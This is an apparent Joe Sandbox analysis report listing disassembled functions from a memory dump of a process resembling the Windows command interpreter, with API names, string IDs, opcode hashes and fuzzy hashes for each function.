                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$iswspacewcschr
                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                      • API String ID: 840959033-3627297882
                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction ID: c421526ab7fca0619a36b3f039d2c93d4f4f4737810d5a35944bd677fb0c8efc
                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction Fuzzy Hash: 3CD13A21E0864396EB14FB21A8473B9A7A0BF44B45FC48837D94E86295DFBCE445C7B2
                                                      Function 00007FF7E1DB32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB32F3
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7E1DB32A4), ref: 00007FF7E1DB3309
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DB3384
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD11DF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                      • String ID:
                                                      • API String ID: 611521582-0
                                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction ID: e67de628feecd4995199a8be9ed52fba567cc3b849a72915c67a4e4799ac21ff
                                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction Fuzzy Hash: 77A1B332F08612A6E718EB61A84277DF7A1FB49B46F848136DD0E86744DFBCE445C722
                                                      Function 00007FF7E1DC26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateFile_open_osfhandle
                                                      • String ID: con
                                                      • API String ID: 2905481843-4257191772
                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction ID: 28c94b767a3f3a8ab91745c11f618c4a820b8c3368c99349bcebe8ad41540cb1
                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction Fuzzy Hash: BB71F572A086818AE720EF14E441379FAA0FB89B61F908636DE5E437D4DFBCD449CB51
                                                      Function 00007FF7E1DE1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                      • String ID: CSVFS$NTFS$REFS
                                                      • API String ID: 3510147486-2605508654
                                                      • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction ID: d5109ec977ddfb670ce27ede2dd98124cdc1ebd0c64a30f435b3edf5cd48074b
                                                      • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                      • Instruction Fuzzy Hash: 12617032B04BC28AEB65DF21D8453E9B7A4FB45B85F848136DA0E8B758DFB8D104C711
                                                      Function 00007FF7E1DB72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF7E1DB7279,?,?,?,?,?,00007FF7E1DBBFA9), ref: 00007FF7E1DD4485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: longjmp
                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                      • API String ID: 1832741078-366822981
                                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction ID: f2986dfb5bad7aab7f88fde25f359ef9a1f6a9f63bd8ddbb89306ee490ca39ef
                                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                      • Instruction Fuzzy Hash: CBC19060F0C64292EB29FB165583BB8A391AB46B94FD14137DD0E93B91CFBCE4458363
                                                      Function 00007FF7E1DC662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC6677
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC668F
                                                      • _errno.MSVCRT ref: 00007FF7E1DC66A3
                                                      • wcstol.MSVCRT ref: 00007FF7E1DC66C4
                                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66E4
                                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7E1DC6570,?,?,?,?,?,?,00000000,00007FF7E1DC6488), ref: 00007FF7E1DC66FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                                      • API String ID: 2348642995-441775793
                                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction ID: ca8143f6e47332e88ab069ff67c314f5b3a21bba278fb472dbcc5122a00a3721
                                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                      • Instruction Fuzzy Hash: FF719172D0864685EB60AF11D412379F7A0EB45B45F94C833DA5E82794EFBCE484C7A2
                                                      Function 00007FF7E1DB86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                      • API String ID: 3223794493-3086019870
                                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction ID: ca804720800a187d85eb06eb867aab45701d57453f7ed891932efa93b519e904
                                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction Fuzzy Hash: 0151C565E08B4296EB05EB15E402379BBA0FF49B91F948537C91E433A4DFBCE050C762
                                                      Function 00007FF7E1DD86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                      • String ID: %s$/-.$:
                                                      • API String ID: 1644023181-879152773
                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction ID: 701e5021337040c924c7f446fcc6cad4d86dbdf22d7f0a67309c3071e22cea9d
                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction Fuzzy Hash: 9391A562A0864291EF15EB14E4423BEE3A0FF84B94FC44637DA4E426D4DFBCE595C322
                                                      Function 00007FF7E1DD627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DD7251), ref: 00007FF7E1DD628E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ObjectSingleWait
                                                      • String ID: wil
                                                      • API String ID: 24740636-1589926490
                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction ID: d9b4ed31722e88786d684c2bba737dde0e40d30a2e71c38c5cb31365cac5cc94
                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction Fuzzy Hash: EE416531A0C54283F320EB15E84237DEAA1EF85781FD48232D529C66D4DFBDE8458762
                                                      Function 00007FF7E1DB7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                      • String ID:
                                                      • API String ID: 1397130798-0
                                                      • Opcode ID: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                      • Instruction ID: a57081c8e1d308c905f548089beba95f808c653a5985bebefc1e5a8f2ca59585
                                                      • Opcode Fuzzy Hash: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                      • Instruction Fuzzy Hash: C991C522B08B8296EB64EB11D4427B9F3A1FB84B94FC48036DA4E47794EF7CD540C762
                                                      Function 00007FF7E1DC7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • iswspace.MSVCRT ref: 00007FF7E1DC7EEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: A
                                                      • API String ID: 3731854180-3554254475
                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction ID: bd1c010b9b388b58595fccc91fe61a4f700d062647ee87abe3602ae295c908d7
                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction Fuzzy Hash: BFA18D6290968286E724FB21A44237DF6A0FF89791F80C536DA8D47794DFBCE451CB22
                                                      Function 00007FF7E1DD9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Enum$Openwcsrchr
                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                      • API String ID: 3402383852-1459555574
                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction ID: 53927a568236833ef1e237450670e4c249fac1d954a8a92c2a8f5b739748fb4a
                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction Fuzzy Hash: 72A1C761A0964292EF19EB55D0523B9E2A0FF85B90FC44632DA4F477C4DFBDE941C322
                                                      Function 00007FF7E1DC7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscmp
                                                      • String ID: %s
                                                      • API String ID: 243296809-3043279178
                                                      • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction ID: 2e5331608cf49b331b387461752fd860a29b8f58b3e68a0e05dc695ab059baf2
                                                      • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction Fuzzy Hash: 99A1C022B0978696EF35EF21D8423F9A3A0FB48758F904436DA4E4B694EF7CE644C351
                                                      Function 00007FF7E1DDBA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
